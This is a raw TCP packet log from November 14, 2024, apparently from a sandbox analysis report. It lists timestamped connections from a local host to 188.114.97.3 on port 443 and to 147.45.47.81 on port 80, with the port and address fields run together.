                                                                                                                                                                                                            Nov 14, 2024 12:19:43.418139935 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.419270039 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.419384956 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.419420004 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.419482946 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.419490099 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.482158899 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.482311964 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.488765001 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.488787889 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.489018917 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.490032911 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.490175962 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.490210056 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.490267038 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.490277052 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.420221090 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.420456886 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.420650005 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.420650005 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.440092087 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.440352917 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.440356016 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.440431118 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.727610111 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.727652073 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.738192081 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.738230944 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.738311052 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.738579035 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:45.738590956 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.199070930 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.199120998 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.199201107 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.199467897 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.199476004 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.363280058 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.363351107 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.364422083 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.364428997 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.364630938 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.365721941 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.365910053 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.365940094 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.366000891 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.366008997 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.837662935 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.838915110 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.838915110 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.838943958 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.839996099 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.841272116 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.841272116 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:46.841329098 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.279719114 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.279968023 CET44349903188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.280075073 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.280075073 CET49903443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.312345028 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.312582970 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.312711000 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.314723015 CET49904443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.314764977 CET44349904188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.706350088 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.706383944 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.706449986 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.706736088 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.706748962 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.774487019 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.774544001 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.774630070 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.774936914 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:47.774946928 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.321683884 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.321902037 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.322983980 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.323002100 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.323430061 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.324584961 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.324656010 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.324667931 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.386790991 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.386895895 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.387885094 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.387897968 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.388658047 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.389827013 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.390651941 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.390686989 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.390779972 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.390822887 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.390938044 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.391000032 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.391119957 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.391160965 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.392623901 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.392673969 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.392826080 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.392872095 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.392885923 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.392894983 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.393029928 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.393070936 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.393096924 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.393246889 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.393290997 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.401349068 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.401551962 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.401608944 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.401638031 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.401663065 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.401690006 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.406322002 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.814923048 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.815177917 CET44349914188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.815289021 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:48.815289974 CET49914443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:49.506855011 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:49.506922007 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:49.507009029 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:49.507241011 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:49.507251024 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.115550995 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.115622997 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.118815899 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.118829966 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.119065046 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.120891094 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.121925116 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.121957064 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122080088 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122111082 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122219086 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122243881 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122354031 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122380018 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122507095 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122535944 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122656107 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122692108 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122701883 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122837067 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.122874975 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.132896900 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133038998 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133068085 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133079052 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133090019 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133102894 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133208036 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133255005 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.133280993 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.137654066 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.137725115 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:50.137732983 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.281780958 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.281858921 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.281939030 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.282174110 CET49915443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.282190084 CET44349915188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.344182968 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.344245911 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.344384909 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.344650984 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.344687939 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.951195002 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.951370955 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.952529907 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.952549934 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.952790976 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.953983068 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.954009056 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:51.954054117 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.019360065 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.019444942 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.019618034 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.019845963 CET49926443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.019864082 CET44349926188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.085048914 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.085108995 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.085297108 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.085576057 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.085585117 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.708210945 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.708803892 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.709861994 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.709872007 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.710750103 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.711951971 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.711987972 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:53.712028980 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.158621073 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.158696890 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.158871889 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.159041882 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.159271955 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.159347057 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.161725044 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.161736012 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.161747932 CET49934443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.161752939 CET44349934188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.162647009 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.162652969 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.162664890 CET49945443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.162669897 CET44349945188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.167632103 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.168298006 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.172391891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.172483921 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.172616959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.173027992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.173088074 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.173187017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.177511930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.177985907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017321110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017352104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017368078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017379999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017393112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017395973 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017405987 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017419100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017431974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017446995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017460108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017472982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017472982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017473936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017523050 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.022397995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.022507906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.022567987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037372112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037426949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037440062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037461042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037472010 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037476063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037483931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037511110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037512064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037524939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037537098 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037538052 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037547112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037574053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037587881 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.042403936 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.042416096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.042424917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.042490005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138147116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138166904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138178110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138190985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138205051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138309002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138515949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138531923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138545990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138570070 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138598919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138788939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138832092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138849020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138861895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138874054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138891935 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.138904095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.139674902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.139688015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.139699936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.139713049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.139725924 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.139753103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140259027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140269995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140280962 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140301943 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140328884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140330076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140342951 CET8049958147.45.47.81192.168.2.10
